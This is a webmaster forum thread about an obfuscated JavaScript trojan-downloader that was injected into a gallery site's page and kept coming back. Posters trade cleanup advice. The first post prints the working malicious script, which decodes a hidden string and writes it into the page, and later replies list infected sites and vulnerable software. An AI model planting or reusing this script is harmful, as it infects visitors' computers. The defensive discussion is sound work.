javascript trojan on my tgp

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • eMonk
    Confirmed User
    • Aug 2003
    • 2310

    #1

    javascript trojan on my tgp

    the following javascript code keeps on reappearing on my tgp site. has everyone delt with this trojan before? i can temporary remove it by deleting my index.shtml file and rebuilding it but it keeps coming back. here's the javascript code:

    <script language="JavaScript">
    e = '0x00' + '22';str1 = "%99%C1%CA%D7%BD%D0%D1%DA%C9%C6%9E%83%D7%CA%D0%CA% C3%CA%C9%CA%D1%DA%9B%C5%CA%C1%C1%C6%CF%83%9F%99%CA %C7%D3%C2%CE%C6%BD%D0%D3%C0%9E%83%C5%D1%D1%CD%9B%8 C%8C%C1%CF%D7%8E%C0%CC%D6%CF%D1%C6%D3%8F%C0%CC%CE% 8C%D1%D3%C7%8C%83%BD%D4%CA%C1%D1%C5%9E%92%BD%C5%C6 %CA%C4%C5%D1%9E%92%9F%99%8C%CA%C7%D3%C2%CE%C6%9F%9 9%8C%C1%CA%D7%9F%BD%AE%AB";str=tmp='';for(i=0;i<st r1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
    </script>

    my system was infected with a trojan but its been cleaned and removed. please advise.
  • Quickdraw
    Confirmed User
    • Mar 2004
    • 1717

    #2
    you are not alone. There are a whole bunch of sites out there getting hit.

    Check the scripts you are using on that site. Most likely that is how they got in. Check cron files and so on. And of course contact your host, they might have the poop on this stuff.

    Comment

    • 4Pics
      Confirmed User
      • Dec 2001
      • 7952

      #3
      What tgp and trading scripts are you using?

      Are you running phpbb by chance on the server?

      Comment

      • eMonk
        Confirmed User
        • Aug 2003
        • 2310

        #4
        Originally posted by 4Pics
        What tgp and trading scripts are you using?

        Are you running phpbb by chance on the server?
        auto gallery pro & arrow trader lite 3.

        Comment

        • eMonk
          Confirmed User
          • Aug 2003
          • 2310

          #5
          Originally posted by Quickdraw
          you are not alone. There are a whole bunch of sites out there getting hit.

          Check the scripts you are using on that site. Most likely that is how they got in. Check cron files and so on. And of course contact your host, they might have the poop on this stuff.
          no clues in the crontab & host says its due from an unsecure script.

          Comment

          • darnit
            Confirmed User
            • Jul 2001
            • 2439

            #6
            Originally posted by MUNK
            no clues in the crontab & host says its due from an unsecure script.
            What host and were they more specific? If its a managed box from any of the larger hosts I would expect a better response/support than that, considering how prevelant that exploit seems to be.

            Comment

            • eMonk
              Confirmed User
              • Aug 2003
              • 2310

              #7
              Originally posted by darnit
              What host and were they more specific? If its a managed box from any of the larger hosts I would expect a better response/support than that, considering how prevelant that exploit seems to be.
              i'm with webair and using their starter plan.

              Comment

              • pr0
                rockin tha trailerpark
                • May 2001
                • 23088

                #8
                whats it do, prompt to download an exe?
                __________
                Loadedca$h - get sum! - Revengebucks - mmm rebills! - webair (gotz sErVrz)

                Comment

                • eMonk
                  Confirmed User
                  • Aug 2003
                  • 2310

                  #9
                  Originally posted by pr0
                  whats it do, prompt to download an exe?
                  once you load the page, anti-virus program picks it up as a trojan.

                  i just changed my admin password in case and deleted my infected index.shtml file and rebuilt the page. it's clean now but the javascript code usually reappears within a few hours. hopefully not this time. <crosses fingers>

                  Comment

                  • pr0
                    rockin tha trailerpark
                    • May 2001
                    • 23088

                    #10
                    yea but i wonder what kind of trojan it could possibly be...whats it doing to the surfers
                    __________
                    Loadedca$h - get sum! - Revengebucks - mmm rebills! - webair (gotz sErVrz)

                    Comment

                    • darnit
                      Confirmed User
                      • Jul 2001
                      • 2439

                      #11
                      Originally posted by MUNK
                      i'm with webair and using their starter plan.
                      That actually was a surprising and unexpected reply. I use webair but have a dedicated server. I don?t know if there are different tiers of support based on the plans however webair has always provided impeccable support and assistance whenever I have had problems - often spending hours on the phone or via live chat to assist.

                      I haven?t encountered your specific dilemma however so I can?t vouch for what their terms of service are in each particular instance of support requests.

                      Perhaps try hitting them up again?

                      I wish I could assist however I?m all thumbs when it comes to scripts and security, hence my dependence on a good host that will provide that for me.

                      Comment

                      • eMonk
                        Confirmed User
                        • Aug 2003
                        • 2310

                        #12
                        Originally posted by pr0
                        yea but i wonder what kind of trojan it could possibly be...whats it doing to the surfers
                        i believe its called, trojan-downloader.html.agent.aq

                        Comment

                        • darnit
                          Confirmed User
                          • Jul 2001
                          • 2439

                          #13
                          Originally posted by pr0
                          yea but i wonder what kind of trojan it could possibly be...whats it doing to the surfers
                          I would place good money on it not playing nice. Sucks for his bookmarkers as they would have no idea that it wasn't his fault.

                          Perhaps once you get your site clean you should provide links to some free removal software such as adaware, avgfree, MS anti spyware, etc. on your site and explain why they should use them.

                          Comment

                          • eMonk
                            Confirmed User
                            • Aug 2003
                            • 2310

                            #14
                            Originally posted by darnit
                            That actually was a surprising and unexpected reply. I use webair but have a dedicated server. I don?t know if there are different tiers of support based on the plans however webair has always provided impeccable support and assistance whenever I have had problems - often spending hours on the phone or via live chat to assist.

                            I haven?t encountered your specific dilemma however so I can?t vouch for what their terms of service are in each particular instance of support requests.

                            Perhaps try hitting them up again?

                            I wish I could assist however I?m all thumbs when it comes to scripts and security, hence my dependence on a good host that will provide that for me.
                            i don't have any complaints with webair or their support. i contacted them via email and was told, "It can usually be attributed to an unsecure script", so i'm contacting the script creators and going to see what they say about this.

                            Comment

                            • eMonk
                              Confirmed User
                              • Aug 2003
                              • 2310

                              #15
                              Originally posted by darnit
                              I would place good money on it not playing nice. Sucks for his bookmarkers as they would have no idea that it wasn't his fault.

                              Perhaps once you get your site clean you should provide links to some free removal software such as adaware, avgfree, MS anti spyware, etc. on your site and explain why they should use them.
                              providing my bookmarkers with free software is a great idea. i'll get some links up later today.

                              Comment

                              • SmokeyTheBear
                                ►SouthOfHeaven
                                • Jun 2004
                                • 28609

                                #16
                                dude contact webair and tell them to tell you what the problem is for sure , you shouldnt be left guessing.. or find a new host..

                                Im with webair , and they have always answered my questions promtly , sometimes people give bland answers ask for facts..

                                alot of people asking me about this trojan lately.. prob the "spysheriff" verio.s and its prob set to a cronjob or something on a schedult to reinfect you so it wont just "go away " on its own or by deleting anything

                                do you have any blog software ? wordpress seems to be a common target .. cpanel also has some problems lately.. so make sure your up to date..
                                hatisblack at yahoo.com

                                Comment

                                • darnit
                                  Confirmed User
                                  • Jul 2001
                                  • 2439

                                  #17
                                  Originally posted by SmokeyTheBear
                                  dude contact webair and tell them to tell you what the problem is for sure , you shouldnt be left guessing.. or find a new host..

                                  Im with webair , and they have always answered my questions promtly , sometimes people give bland answers ask for facts..

                                  alot of people asking me about this trojan lately.. prob the "spysheriff" verio.s and its prob set to a cronjob or something on a schedult to reinfect you so it wont just "go away " on its own or by deleting anything

                                  do you have any blog software ? wordpress seems to be a common target .. cpanel also has some problems lately.. so make sure your up to date..
                                  Bump for STB. He certainly knows his shit and his advice is dead on. Btw if that is the spysheriff virus also instruct your surfers to chargeback if they do fall for the spysheriff pitch. Its basically rasomware that takes over the computer and charges users for their software to "remove" what they have been responsible for installing. Nasty shit. I also found these other posts with the identical problem. Hope they are helpfull.

                                  http://www.gofuckyourself.com/showthread.php?t=611063
                                  http://www.gofuckyourself.com/showthread.php?t=561290
                                  http://www.gofuckyourself.com/showthread.php?t=559591

                                  Comment

                                  • Linkster
                                    Confirmed User
                                    • Feb 2003
                                    • 3216

                                    #18
                                    If you have access to raw logs check to see if it was just placed on the page and uploaded - this has been the most common way pages had this installed - most likely due to someone with access to a password file as there is never any intrusion attempts and the page is just ftp'd - most people that were hit were using a common password on their server and either a processing program or sponsor (we havent found the common one yet to figure out who's password list was compromised)

                                    The second way is one of these programs with security holes:
                                    Vbulletin
                                    PHPBB
                                    Autolinks
                                    Invision Power Board
                                    phpmyadmin
                                    phpadsnew
                                    wordpress
                                    awstats 6.5
                                    sitedepth
                                    I-RATER
                                    phpBazar

                                    Most of these have recently released updates for their security holes
                                    Porn Links Crak for your bank account - Get Addicted
                                    FREE LIVE CAM SHOWS

                                    Comment

                                    • eMonk
                                      Confirmed User
                                      • Aug 2003
                                      • 2310

                                      #19
                                      i don't have access to raw log files but i changed my admin password before i went to bed and my page is still clean.

                                      Comment

                                      • Quickdraw
                                        Confirmed User
                                        • Mar 2004
                                        • 1717

                                        #20
                                        Have you checked the templates in your scripts?

                                        Here are a few more url's with the same script, in case anyone knows the owners.

                                        wanktool.com
                                        teensinboots.com/index.shtml
                                        technorgasmic.com
                                        nastylatex.com/index.shtml
                                        pornlinks-united.com

                                        Comment

                                        • Gambit
                                          Confirmed User
                                          • Nov 2005
                                          • 571

                                          #21
                                          As far as i know its the guy that does it is using an exploit in autogallery to stick the trojan on your site.
                                          Promote http://www.tiedvirgins.com for amazing bondage conversions. CCbill 50/50.

                                          Comment

                                          • eMonk
                                            Confirmed User
                                            • Aug 2003
                                            • 2310

                                            #22
                                            Originally posted by Quickdraw
                                            Have you checked the templates in your scripts?
                                            one of my toplist templates had the javascript code & i removed it. it came back again but in a different section of the shtml file. it keeps coming back after i clean it but in different locations of the shtml file. the javascript code is always found at the bottom portion of the shtml file. it hasn't reappeared ever since i changed my admin password lastnight before i went to bed.

                                            Comment

                                            • Corona
                                              Confirmed User
                                              • Feb 2002
                                              • 2185

                                              #23
                                              I got it a week or so ago and so far it only appeared just that once. The only scripts I am using on that site are phpadsnew and Links 2.0
                                              I was looking for a job, and then I found a job
                                              And heaven knows I'm miserable now

                                              Comment

                                              • Mighty Chin
                                                Confirmed User
                                                • Aug 2003
                                                • 781

                                                #24
                                                Yup had it as well. just deleted the code and changed my server password
                                                Do you need design work done. I am available check out my site TMC Web Designs

                                                Comment

                                                Working...